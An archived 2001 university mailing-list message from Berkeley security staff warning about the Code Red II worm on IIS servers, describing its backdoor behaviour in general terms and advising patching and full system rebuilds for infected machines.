From: Mike Friedman (mikef@ack.berkeley.edu)
Date: Mon Aug 06 2001 - 17:05:22 PDT
On Mon Aug 6 16:42:30 2001, Sherry M. Rogers said:
> I'm sending a clarification to the first note about Code Red II since
> apparently I was not clear about how to protect your systems from this
> second worm.
>
> Code Red II takes advantage of the same IIS vulnerability as that
> of the original Code Red worm, therefore the same patches will protect
> your system.
>
> The best source of information about checking and protecting your
> system from both Code Red worms is to go to the Digital Island site
> below and follow the step-by-step instructions.
>
> http://www.digitalisland.net/codered
I don't want to risk muddying the waters by posting a 'clarification to the
clarification'. But I just want to remind folks who are seeing all these
notes that there are two issues here:
o As Sherry says, the instructions for protecting yourself from an
initial attack by Code Red II are the same as for Code Red I.
o BUT... if you've already been 'infected' by Code Red II, the
procedures for cleaning your machine are much more involved for
CR II than for CR I. In case you didn't save it, I'm including
below Sherry's earlier note which talks about what to do if your
machine actually has been compromised by CR II.
Mike
============
A new worm is infecting vulnerable machines running IIS servers on
the internet and has already infected many hosts on the campus.
It is called the Code Red II worm, though it has little in common with the
original Code Red worm other than using the buffer overflow vulnerability
in Microsoft's IIS Indexing Service DLL (ida.dll) to infect the victim.
Code Red II can infect unpatched Windows 2000 servers running IIS 4.0 or
5.0 with Indexing Service installed. It can cause unpatched Windows NT
servers to crash.
The Code Red II worm is far more malicious than its predecessor:
1) It spreads more quickly by targeting hosts on the local network, making
it difficult to catch by monitoring network traffic at the border of
campus.
2) It makes the system it infects vulnerable to *any* kind of attack by
copying the CMD.EXE to root.exe in a publicly accessible directory.
This allows any intruder to execute arbitrary commands on the
compromised machine.
3) It creates a Trojan horse copy of explorer.exe which makes
registry changes allowing for the placement of "backdoors" for future
access to the system. These changes create a virtual web path with
read and write access to all files on the c: and d: drives.
Note: deleting the registry settings, removing the copies of root.exe, and
removing the trojan explorer.exe is NOT sufficient to clean the system.
During the time the system was backdoored any attacker could have
installed code not associated with this worm.
Any system infected with Code Red II will need to be rebuilt from secure
media, such as CD, to ensure that is clean and that no backdoors have been
left on the system. Applying all maintenance, in particular all IIS
maintenance, will also be essential.
This worm spreads so fast that it is also essential to not connect any new
system to the network unless you are sure IIS is disabled. Immediately
apply the IIS patches once the system is on the network, whether or not
you plan to run the service. Often IIS can be turned on by software
packages at a later time.
References:
http://www.cert.org/incident_notes/IN-2001-09.html
http://www.incidents.org/react/code_redII.php
Resources:
Securing IIS:
http://securityfocus.com/focus/microsoft/iis/iissecure.html
Free Code Red scanner from eEye:
http://www.eeye.com/html/Research/Tools/
----------------------------------------------------------------------------
Mike Friedman mikef@ack.Berkeley.EDU
System & Network Security +1-510-642-1410
University of California at Berkeley http://ack.Berkeley.EDU/~mikef
----------------------------------------------------------------------------
-----------------------------------------------------------------------
The following was automatically added to this message by the list server:
Webnet information is available at <URL:http://wss.berkeley.edu/webnet/>.
This archive was generated by hypermail 2b29 : Mon Aug 06 2001 - 17:10:02 PDT